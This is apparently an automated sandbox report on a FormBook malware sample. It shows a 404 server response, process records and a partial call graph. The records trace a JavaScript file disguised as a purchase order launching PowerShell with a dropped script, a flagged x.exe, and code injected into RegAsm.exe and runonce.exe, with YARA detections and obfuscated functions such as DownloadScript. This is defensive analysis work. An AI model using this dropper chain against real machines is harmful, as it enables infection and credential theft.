                                                                                  Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:02:07:16
                                                                                  Start date:18/02/2025
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO from tpc Type 34.1 34,2 35 Spec 1.js"
                                                                                  Imagebase:0x7ff768a40000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:02:07:30
                                                                                  Start date:18/02/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                                                  Imagebase:0x7ff6e3d50000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:02:07:30
                                                                                  Start date:18/02/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:02:07:33
                                                                                  Start date:18/02/2025
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x140000
                                                                                  File size:412'672 bytes
                                                                                  MD5 hash:EED510D5B377CDBD8BCE6F25AD5E7EF9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 62%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:02:07:33
                                                                                  Start date:18/02/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                  Imagebase:0x9d0000
                                                                                  File size:65'440 bytes
                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2774125614.0000000005670000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2768044762.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2770300922.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:02:08:12
                                                                                  Start date:18/02/2025
                                                                                  Path:C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\AMZTwEptm8O.exe"
                                                                                  Imagebase:0x60000
                                                                                  File size:143'872 bytes
                                                                                  MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3426268261.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:10
                                                                                  Start time:02:08:14
                                                                                  Start date:18/02/2025
                                                                                  Path:C:\Windows\SysWOW64\runonce.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\runonce.exe"
                                                                                  Imagebase:0xe00000
                                                                                  File size:47'104 bytes
                                                                                  MD5 hash:9E16655119DDE1B24A741C4FD4AD08FC
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3423391595.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3424044771.0000000000DB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3424239645.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:02:08:27
                                                                                  Start date:18/02/2025
                                                                                  Path:C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe"
                                                                                  Imagebase:0x60000
                                                                                  File size:143'872 bytes
                                                                                  MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:13
                                                                                  Start time:02:08:39
                                                                                  Start date:18/02/2025
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff728280000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Call Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C4 clusterC8C6 clusterC10C6 clusterC12C6 clusterC14C6 clusterC16C6 clusterC18C6 clusterC20C6 clusterC22C4 clusterC24C22 clusterC26C22 clusterC28C22 clusterC30C2 clusterC32C0 clusterC34C32 clusterC36C0 clusterC38C36 clusterC40C0 clusterC42C40 clusterC44C40 clusterC46C40 clusterC48C40 clusterC50C40 clusterC52C40 clusterC54C40 clusterC56C0 clusterC58C0 clusterC60C0 clusterC62C60 clusterC64C62 clusterC66C64 clusterC68C64 clusterC70C64 clusterC72C64 clusterC74C64 clusterC76C64 clusterC78C64 clusterC80C60 clusterC82C0 clusterC84C82 clusterC86C82 clusterC88C82 clusterC90C0 clusterC92C90 clusterC94C0 clusterC96C0 E1C0 entry:C0 F3C2 _0x25cf E1C0->F3C2 F41C40 E1C0->F41C40 F57C56 _0x2f88bb E1C0->F57C56 F59C58 _0x4f91b1 E1C0->F59C58 F83C82 DownloadScript E1C0->F83C82 F91C90 LogError E1C0->F91C90 F95C94 RunPowerShellScript E1C0->F95C94 F97C96 'Quit' E1C0->F97C96 F3C2->F3C2 F37C36 _0x3341 F3C2->F37C36 F5C4 F31C30 'Aghzgi' F5C4->F31C30 F7C6 F9C8 'charAt' F7C6->F9C8 F11C10 'fromCharCode' F7C6->F11C10 F13C12 'indexOf' F7C6->F13C12 F15C14 'slice' F7C6->F15C14 F17C16 'toString' F7C6->F17C16 F19C18 'charCodeAt' F7C6->F19C18 F21C20 decodeURIComponent F7C6->F21C20 F23C22 F25C24